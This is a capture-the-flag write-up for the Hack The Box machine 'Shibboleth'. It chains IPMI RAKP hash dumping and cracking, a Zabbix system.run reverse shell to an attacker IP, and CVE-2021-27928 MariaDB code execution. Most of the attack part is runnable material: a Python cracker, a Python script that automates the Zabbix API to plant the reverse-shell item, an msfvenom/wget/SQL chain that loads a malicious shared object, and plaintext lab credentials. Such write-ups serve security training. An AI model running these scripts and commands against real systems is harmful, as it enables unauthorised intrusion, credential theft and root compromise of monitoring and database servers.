Basic information

Port scan

Only port 80 is open on TCP:

```
$ nmap -sV -sC 10.10.11.124
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-18 12:57 CST
Nmap scan report for 10.10.11.124
Host is up (0.070s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: shibboleth.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.09 seconds
```

Port 80

Visiting the IP redirects to the domain name, so add a hosts entry:

```
10.10.11.124 shibboleth.htb
```

The page footer reads "Powered by enterprise monitoring solutions based on Zabbix & Bare Metal BMC automation", which already hints at both Zabbix and a BMC (IPMI) interface.

vhosts

Virtual-host brute forcing finds several subdomains, one of them zabbix:

```
gobuster vhost -u http://shibboleth.htb/ -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -k -t 50  | grep 200
Found: monitor.shibboleth.htb (Status: 200) [Size: 3686]
Found: monitoring.shibboleth.htb (Status: 200) [Size: 3686]
Found: zabbix.shibboleth.htb (Status: 200) [Size: 3686]
```

zabbix.shibboleth.htb

UDP ports

A UDP scan reveals port 623:

```
sudo nmap -sU -sV -F -v 10.10.11.124

PORT STATE SERVICE VERSION
623/udp open asf-rmcp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.92%I=7%D=11/18%Time=6195DFD3%P=x86_64-apple-darwin20.4.
SF:0%r(ipmi-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x00
SF:8\0\x01\x97\x04\x03\0\0\0\0\t");
```

Searching for the service (asf-rmcp on 623/udp) shows that this is IPMI.

IPMI

Following the reference material, dump the hash and crack the password step by step. The weakness is in the IPMI 2.0 RAKP handshake: in RAKP message 2 the BMC returns an HMAC keyed with the requested user's password before the client has authenticated, so the hash can be retrieved for any valid user name and cracked offline:

```
ilovepumkinpie1  (10.10.11.124 Administrator)
```
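What the "dump hash, crack password" step actually computes, as an added example that is not part of the original writeup: the RAKP message 2 integrity value is HMAC-SHA1(K_UID, SIDm || SIDc || Rm || Rc || GUIDc || ROLEm || ULENm || UNAMEm), with K_UID being the user's password. The session IDs, random numbers and GUID below are constructed stand-ins for values that a real run would capture from the RAKP 1/2 exchange (for instance with Metasploit's ipmi_dumphashes); the password and user name are the ones from this box.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def rakp2_salt(sid_m: bytes, sid_c: bytes, rand_m: bytes, rand_c: bytes,
               guid_c: bytes, role_m: int, username: bytes) -> bytes:
    """Input to the RAKP message 2 HMAC (IPMI 2.0 spec, section 13.28):
    SIDm || SIDc || Rm || Rc || GUIDc || ROLEm || ULENm || UNAMEm."""
    if len(sid_m) != 4 or len(sid_c) != 4:
        raise ValueError("session IDs are 4 bytes")
    if len(rand_m) != 16 or len(rand_c) != 16 or len(guid_c) != 16:
        raise ValueError("random numbers and the BMC GUID are 16 bytes")
    if not 0 < len(username) <= 16:
        raise ValueError("IPMI user names are 1..16 bytes")
    return (sid_m + sid_c + rand_m + rand_c + guid_c
            + bytes([role_m & 0xFF, len(username)]) + username)


def rakp2_hmac(password: bytes, salt: bytes) -> bytes:
    """K_UID is the stored user password, zero padded to the 20-byte key size.
    HMAC already zero-pads short keys, so hashing with the raw password gives the
    same digest; that is why a cracker can test plain wordlist entries."""
    return hmac.new(password, salt, hashlib.sha1).digest()


def hashcat_line(salt: bytes, digest: bytes) -> str:
    """Line format consumed by hashcat mode 7300 (IPMI2 RAKP HMAC-SHA1): salt:hash."""
    return f"{salt.hex()}:{digest.hex()}"


def crack(digest: bytes, salt: bytes, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute the HMAC per candidate and compare."""
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_hmac(candidate, salt), digest):
            return candidate
    return None


# Constructed session values standing in for a captured RAKP 1/2 exchange.
DEMO_SALT = rakp2_salt(
    sid_m=bytes.fromhex("a4a3a2a0"),      # console session ID (constructed)
    sid_c=bytes.fromhex("02000000"),      # BMC session ID (constructed)
    rand_m=bytes(range(16)),              # console random number (constructed)
    rand_c=bytes(range(16, 32)),          # BMC random number (constructed)
    guid_c=bytes(16),                     # BMC GUID (constructed)
    role_m=0x14,                          # requested privilege: Administrator, name-only lookup
    username=b"Administrator",
)
# The value the BMC would return in RAKP message 2 for this user.
DEMO_DIGEST = rakp2_hmac(b"ilovepumkinpie1", DEMO_SALT)
DEMO_WORDLIST = [b"password", b"admin", b"ilovepumkinpie1", b"Administrator"]

if __name__ == "__main__":
    print(hashcat_line(DEMO_SALT, DEMO_DIGEST))
    print("recovered:", crack(DEMO_DIGEST, DEMO_SALT, DEMO_WORDLIST))
```

The only defence on the BMC side is password strength (or disabling IPMI-over-LAN and isolating 623/udp); the protocol itself leaks the hash to anyone who can name a valid user.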

zabbix

The credentials obtained from IPMI also log in to Zabbix:

shell

Zabbix can run system commands on the hosts it monitors through the agent: Configuration -> Hosts -> Items -> Create item, with a system.run key. The command runs with the privileges of the Zabbix agent on that host, and only if the agent is configured to allow system.run (AllowKey=system.run[*] on agents from 5.0.2 on, EnableRemoteCommands=1 on older ones); otherwise the item is reported as not supported:

```
system.run[bash -c 'exec bash -i &>/dev/tcp/10.10.14.7/4444 <&1',nowait]
```
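The same steps driven through the Zabbix JSON-RPC API instead of the web UI, as an added example that is not part of the original writeup. It assumes a Zabbix 5.0-style API (user.login taking "user", the session token sent in the "auth" field, item type 0 = Zabbix agent), and the host names, IDs and the fake server used for the offline run are constructed; on a real target pass http_post_json as the transport.

```python
import json
import urllib.request
from typing import Callable, List, Optional, Tuple

Transport = Callable[[str, dict], dict]


def http_post_json(url: str, payload: dict) -> dict:
    """Real transport: one JSON-RPC call over HTTP to /api_jsonrpc.php."""
    req = urllib.request.Request(
        url, data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json-rpc"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.loads(resp.read().decode())


def system_run_key(command: str, nowait: bool = True) -> str:
    """Build the item key. Key parameters are comma separated, so a command that
    contains a comma or a closing bracket must be double-quoted (inner quotes escaped)."""
    if "," in command or "]" in command:
        command = '"' + command.replace('"', '\\"') + '"'
    return f"system.run[{command},nowait]" if nowait else f"system.run[{command}]"


class ZabbixApi:
    def __init__(self, base_url: str, post: Transport = http_post_json):
        self.url = base_url.rstrip("/") + "/api_jsonrpc.php"
        self.post = post
        self.auth: Optional[str] = None
        self.request_id = 0

    def call(self, method: str, params: dict):
        self.request_id += 1
        payload = {"jsonrpc": "2.0", "method": method, "params": params, "id": self.request_id}
        if method != "user.login":
            payload["auth"] = self.auth  # session token returned by user.login
        resp = self.post(self.url, payload)
        if "error" in resp:
            raise RuntimeError(f"{method} failed: {resp['error']}")
        return resp["result"]

    def login(self, user: str, password: str) -> str:
        self.auth = self.call("user.login", {"user": user, "password": password})
        return self.auth

    def agent_hosts(self) -> List[Tuple[str, str, str]]:
        """(hostid, host, interfaceid) for hosts with a Zabbix agent interface (type 1).
        Only those can run system.run; SNMP/IPMI-only hosts (types 2/3) cannot."""
        hosts = self.call("host.get", {"output": ["hostid", "host"],
                                       "selectInterfaces": ["interfaceid", "type"]})
        found = []
        for h in hosts:
            for iface in h.get("interfaces", []):
                if str(iface["type"]) == "1":
                    found.append((h["hostid"], h["host"], iface["interfaceid"]))
        return found

    def create_run_item(self, hostid: str, interfaceid: str, command: str, name: str = "sysrun") -> dict:
        return self.call("item.create", {
            "name": name, "key_": system_run_key(command),
            "hostid": hostid, "interfaceid": interfaceid,
            "type": 0,        # 0 = Zabbix agent (passive): the server polls the agent, which evaluates the key
            "value_type": 3,  # 3 = numeric unsigned; with nowait the agent just returns 1
            "delay": "30s",   # poll interval, so the command runs within about 30 s
        })


def fake_zabbix_post(url: str, payload: dict) -> dict:
    """Constructed offline stand-in for a Zabbix 5.0 server so the block runs without a target."""
    token = "0424bd59b807674191e7d77572075f33"
    method = payload["method"]
    if method != "user.login" and payload.get("auth") != token:
        return {"jsonrpc": "2.0", "error": {"code": -32602, "message": "Not authorised."}, "id": payload["id"]}
    if method == "user.login":
        result = token
    elif method == "host.get":
        result = [{"hostid": "10084", "host": "Zabbix server", "interfaces": [{"interfaceid": "1", "type": "1"}]},
                  {"hostid": "10085", "host": "bmc", "interfaces": [{"interfaceid": "2", "type": "3"}]}]
    elif method == "item.create":
        result = {"itemids": ["24758"]}
    else:
        return {"jsonrpc": "2.0", "error": {"code": -32601, "message": "Method not found."}, "id": payload["id"]}
    return {"jsonrpc": "2.0", "result": result, "id": payload["id"]}


def demo(post: Transport = fake_zabbix_post) -> dict:
    api = ZabbixApi("http://zabbix.shibboleth.htb", post=post)
    api.login("Administrator", "ilovepumkinpie1")
    hostid, _, interfaceid = api.agent_hosts()[0]
    return api.create_run_item(hostid, interfaceid,
                               "bash -c 'exec bash -i &>/dev/tcp/10.10.14.7/4444 <&1'")


if __name__ == "__main__":
    print(demo())
```

Start the listener (nc -lvnp 4444) before creating the item; the shell arrives on the next poll, and the item should be deleted afterwards so the agent does not keep reconnecting every 30 s.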

user flag

The local user's password is the same as the Zabbix/IPMI administrator password (password reuse), so it also works for SSH or su:

```
ipmi-svc ilovepumkinpie1
```

Privilege escalation enumeration

The Zabbix server configuration file gives the database password:

```
grep -iR 'password' /etc/zabbix/ 2>/dev/null

/etc/zabbix/zabbix_server.conf.dpkg-dist:### Option: DBPassword
/etc/zabbix/zabbix_server.conf.dpkg-dist:# Database password.
/etc/zabbix/zabbix_server.conf.dpkg-dist:# Comment this line if no password is used.
/etc/zabbix/zabbix_server.conf.dpkg-dist:# DBPassword=
/etc/zabbix/zabbix_server.conf:### Option: DBPassword
/etc/zabbix/zabbix_server.conf:# Database password.
/etc/zabbix/zabbix_server.conf:# Comment this line if no password is used.
/etc/zabbix/zabbix_server.conf:DBPassword=bloooarskybluh
```

Logging in to the database with that password shows MariaDB 10.3.25, and a search for that version turns up a matching vulnerability:

```
mysql -u zabbix -p -D zabbix
```

CVE-2021-27928

MariaDB before 10.2.37, 10.3.28, 10.4.18 and 10.5.9 lets a database user with the SUPER privilege point wsrep_provider at an arbitrary shared object with SET GLOBAL; mysqld dlopen()s that file, so code in the library's constructor runs inside the server process with mysqld's privileges. The zabbix database user here has enough privilege to do this, so the chain is: build a reverse-shell .so, fetch it onto the box, and load it through the database.

```
# Attacking machine: build the shared object, serve it over HTTP (port 7777) and start a listener
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f elf-so -o CVE-2021-27928.so
# e.g. python3 -m http.server 7777 in the directory holding the .so, and nc -lvnp 4444 for the shell

# Target: fetch the library to the path the SQL statement will reference
wget http://10.10.14.7:7777/CVE-2021-27928.so -O /tmp/CVE-2021-27928.so

# Target: load it into mysqld (password bloooarskybluh at the prompt)
mysql -u zabbix -p -D zabbix

SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";
```

References